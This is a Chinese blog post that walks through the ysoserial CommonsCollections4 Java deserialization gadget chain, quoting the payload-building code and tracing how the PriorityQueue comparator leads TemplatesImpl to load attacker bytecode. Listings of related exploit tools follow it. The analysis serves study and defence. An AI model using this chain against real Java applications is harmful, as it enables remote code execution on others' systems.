ysoserial-cc4 java反序列化

最新推荐文章于 2023-02-18 18:46:15 发布
最新推荐文章于 2023-02-18 18:46:15 发布
阅读量249 收藏
点赞数
分类专栏: yso java 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/springgold/article/details/120088065
版权
java 同时被 2 个专栏收录
6 篇文章 0 订阅
订阅专栏
yso
5 篇文章 0 订阅
订阅专栏
ysoserial-cc4 java反序列化
1从入口看

前面和cc3有点像

cc3 如下:
	final Transformer transformerChain = new ChainedTransformer(
			new Transformer[]{ new ConstantTransformer(1) });
		// real chain for after setup
		final Transformer[] transformers = new Transformer[] {
				new ConstantTransformer(TrAXFilter.class),
				new InstantiateTransformer(
						new Class[] { Templates.class },
						new Object[] { templatesImpl } )};


cc4如下:
	ConstantTransformer constant = new ConstantTransformer(String.class);

		// mock method name until armed
		Class[] paramTypes = new Class[] { String.class };
		Object[] args = new Object[] { "foo" };
		InstantiateTransformer instantiate = new InstantiateTransformer(
				paramTypes, args);

		// grab defensively copied arrays
		paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
		args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

		ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });
位置换一下 是不是和cc3类似:

        ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });
        ConstantTransformer constant = new ConstantTransformer(String.class);
        
        Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
        Class[] paramTypes = new Class[] { String.class };
        Object[] args = new Object[] { "foo" };
        InstantiateTransformer instantiate = new InstantiateTransformer(
                paramTypes, args);
        paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
        args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

2)后面触发点:
又了使用PriorityQueue (优先级队列)

	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
		queue.add(1);
		queue.add(1);

		// swap in values to arm
		Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
		paramTypes[0] = Templates.class;
		args[0] = templates;

这样在做反序列话就是PriorityQueue 和2相同
3)
走到PriorityQueued的siftDown,这里的comparator为TransformingComparator类

    private void siftDown(int k, E x) {
        if (comparator != null)
            siftDownUsingComparator(k, x);
        else
            siftDownComparable(k, x);
    }

4)进入siftDownUsingComparator方法

    private void siftDownUsingComparator(int k, E x) {
        int half = size >>> 1;
        while (k < half) {
            int child = (k << 1) + 1;
            Object c = queue[child];
            int right = child + 1;
            if (right < size &&
                comparator.compare((E) c, (E) queue[right]) > 0)
                c = queue[child = right];
            if (comparator.compare(x, (E) c) <= 0)
                break;
            queue[k] = c;
            k = child;
        }
        queue[k] = x;
    }

5)compare方法,其中this.transformer为 构造的ChainedTransformer类

   public int compare(I obj1, I obj2) {
        O value1 = this.transformer.transform(obj1);
        O value2 = this.transformer.transform(obj2);
        return this.decorated.compare(value1, value2);
    }

6)ChainedTransformer的transform

 public T transform(T object) {
        Transformer[] arr$ = this.iTransformers;
        int len$ = arr$.length;

        for(int i$ = 0; i$ < len$; ++i$) {
            Transformer<? super T, ? extends T> iTransformer = arr$[i$];
            object = iTransformer.transform(object);
        }

        return object;
    }

7)首先走到ConstantTransformer的transform,此时constantToReturn 为
之前的 Reflections.setFieldValue(constant, “iConstant”, TrAXFilter.class);
就是TrAXFilter类。

   public ConstantTransformer(O constantToReturn) {
        this.iConstant = constantToReturn;
    }

    public O transform(I input) {
        return this.iConstant;
    }

8)返回TrAXFilter类,接着调用InstantiateTransformer的transform方法,input就是TrAXFilter类

  public T transform(Class<? extends T> input) {
        try {
            if (input == null) {
                throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a null object");
            } else {
                Constructor<? extends T> con = input.getConstructor(this.iParamTypes);
                return con.newInstance(this.iArgs);
            }

根据前面反射赋值

   paramTypes[0] = Templates.class;
   args[0] = templates;

会走到TrAXFilter构造方法

  public TrAXFilter(Templates templates)  throws
        TransformerConfigurationException
    {
        _templates = templates;
        _transformer = (TransformerImpl) templates.newTransformer();
        _transformerHandler = new TransformerHandlerImpl(_transformer);
        _useServicesMechanism = _transformer.useServicesMechnism();
    }

9)关键一步
_transformer = (TransformerImpl) templates.newTransformer();
templates的newTransformer方法
templates为第一步构造的恶意类
TemplatesImpl的newTransformer方法

  public synchronized Transformer newTransformer()
      throws TransformerConfigurationException
  {
      TransformerImpl transformer;

      transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
          _indentNumber, _tfactory);

      if (_uriResolver != null) {
          transformer.setURIResolver(_uriResolver);
      }

      if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
          transformer.setSecureProcessing(true);
      }
      return transformer;
  }

进入getTransletInstance方法

 private Translet getTransletInstance()
      throws TransformerConfigurationException {
      try {
          if (_name == null) return null;

          if (_class == null) defineTransletClasses();
...

defineTransletClasses方法

 private void defineTransletClasses()
      throws TransformerConfigurationException {

      if (_bytecodes == null) {
          ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
          throw new TransformerConfigurationException(err.toString());
      }

      TransletClassLoader loader = (TransletClassLoader)
          AccessController.doPrivileged(new PrivilegedAction() {
              public Object run() {
                  return new TransletClassLoader(ObjectFactory.findClassLoader());
              }
          });

      try {
          final int classCount = _bytecodes.length;
          _class = new Class[classCount];

          if (classCount > 1) {
              _auxClasses = new Hashtable();
          }

          for (int i = 0; i < classCount; i++) {
              _class[i] = loader.defineClass(_bytecodes[i]);
              final Class superClass = _class[i].getSuperclass();
...

_bytecodes恶意字节被load

mtysh1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode, 展示生成的payloads gadget_type:指定使用的payload arguments - payload运行时使用的参数 marshalsec.<marshaller>:指定exploits,根目录下的java文件名
Java安全学习笔记--反序列化漏洞利用CC4
m0_64685672的博客
01-20 1550
测试环境 jdk1.8(jdk8u71) Commons Collections4.0 基于cc2和cc3,由于TransformingComparator+priorityqueue是可以触发transforme()方法所以可以利用这个两个类的组合来代替cc3链中的LazyMap或Transformedmmap+AnnotationinvocationHandler的组合,从而构成了cc4。 恶意类 import com.sun.org.apache.xalan.int...
Java 反序列化漏洞-Apache Commons Collections4-TreeBag攻击链
cjdgg的博客
10-06 1337
知识点补充可以看看我前面写的CC2和CC3CC4这条链其实是CC2的变种,与CC2不同的是和CC3一样用了InstantiateTransformer而不是InvokerTransformer触发利用链,ysoserial中用 PriorityQueue 的 TransformingComparator 触发 ChainedTransformer,再利用 InstantiateTransformer 实例化 TemplatesImpl。
Java反序列化 CC4利用链记录
LTianHang的博客
02-07 209
Java反序列化 CC4利用链记录
Java安全—CommonsCollections4
顶峰
01-09 1503
这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。
[Java反序列化]—CommonsCollections4
snowlyzz的博客
11-26 608
CC4分析
Java反序列化-CC2、4分析
The_W0rld的博客
07-22 1202
在CC2中,使用的将不是前面的commons-collections依赖了,而是commons-collections4这个依赖,并且也采取了一下新的利用类PriorityQueue和TransformingComparator。通过PriorityQueue做为入口点,TransformingComparator作为跳板去触发利用链。...
ysoserial-1.35(exe).zip
09-11
ysoserial.net工具构造恶意序列化数据,一种概念证明工具,用于生成利用不安全的 .NET 对象反序列化的有效负载。。ysoserial.net 是在常见的 .NET 库中发现的实用程序和面向属性的编程“小工具链”的集合,这些库...
java反序列化 ysoserial|ysoserial-master-ff59523eb6-1.jar
12-10
帮助理解java反序列化漏洞的工具,一般还需配套工具:SerializationDumper-v1.13、DeserLab以及抓包分析工具
ysoserial-0.0.6-SNAPSHOT-all.jar
08-03
ysoserial-0.0.6-SNAPSHOT-all.jar;
ysoserial-v0.0.5.jar
09-22
shiro反序列化漏洞的检查工具, 在githup上兜兜转转找了挺久, 上传留着给同事们分享,其他需要的拿去.
Java反序列化漏洞——CommonsCollections4.0版本—CC2、CC4
Thunderclap的博客
02-18 1515
因为这条利⽤链中的关键类org.apache.commons.collections4.comparators.TransformingComparator ,在commonscollections4.0以前是版本中是没有实现Serializable 接⼝的,⽆法在序列化中使⽤。实际上是可用的,比如CC6的链,引入的时候因为⽼的Gadget中依赖的包名都是org.apache.commons.collections ,⽽新的包名已经变。其他的代码不需要改变,即可创建出新版本下的利用链。
10-java安全——java反序列化CC3和CC4链分析
网络安全
07-20 1862
漏洞分析环境: JDK1.7.0_80 apache commons collections-3.0 在maven项目中的pom文件中添加3.1版本的依赖 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version
Java安全--CC4
qq_64201116的博客
12-16 682
而且最关键的是这里它还执行了break方法,所以下面的serialize是压根没有执行,所以连ser.bin的序列化文件都没有生成,怎么反序列化呢?接着在反序列化之前,add函数之后利用反射修改其值改回chainedTransformer,这样在反序列化的时候就可以执行了。为什么我们CC3前面半条不能用这个链子,或者有CC3不就足够了,为什么要再找一个这样的链子,不是画蛇添足吗?我们发现这个判断的时候就被阻隔了,size就是值队列内的数量,因为我们没有添加过任何元素所以这里默认就是0。
Java安全』反序列化-CC4反序列化漏洞POP链分析_ysoserial CommonsCollections4 PoC分析
Ho1aAs‘s Blog
03-12 974
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()2. InstantiateTransformer.transform()调用指定的类构造器3. TransformingComparator.compare()调用this.transformer.transform()4. PriorityQueue反序列化调用comparator.compare()POP链完 前言 同样的,CC4是CC2的变种,改变
Javaweb安全——反序列化漏洞-commons-collections4利用链(CC2和CC4
weixin_43610673的博客
07-06 2191
在2015年底commons-collections反序列化利用链被提出时,Apache Commons Collections有以下两个分支版本:对旧CC链的影响主要体现在 这个方法被修改了在commons-collections4中对应的方法为。3和4的groupId和artifactId都不一样所以可以在同一项目中共存方便调试。 还是做的一个LazyMap构造函数包装,基本就是改了个名字,那将之前的链子decorate换成lazyMap就行,导入的包名变。以CC6为例: CC1、CC3、CC6修改之后
java--CommonsCollections4学习
zyer
05-27 261
和cc2差距不大,那么这次学习一下其它的利用。 TreeBag & TreeMap 在 CC2 中,使用了优先级队列 PriorityQueue 反序列化时会调用 comparator 的 compare 方法的特性,配合 TransformingComparator 触发 transformer。 除了 PriorityQueue,还能否找到其他的提供排序的类,在反序列化时会调用到比较器呢?于是找到了 TreeBag。 探究一下过程 首先看一下TreeBag的readObject方法,发
Java安全研究——反序列化漏洞之CC链
weixin_43889136的博客
04-13 3880
0x01前言 apachecommons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc链的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03反序列化漏洞 序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
ysoserial-0.0.6-snapshot-all.jar
最新发布
12-18
ysoserial-0.0.6-snapshot-all.jar 是一个Java库,用于生成和利用Java反序列化漏洞。 Java反序列化漏洞是一种常见的安全漏洞,攻击者可以通过构造恶意的序列化数据来执行远程代码。ysoserial是一个工具集合,用于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值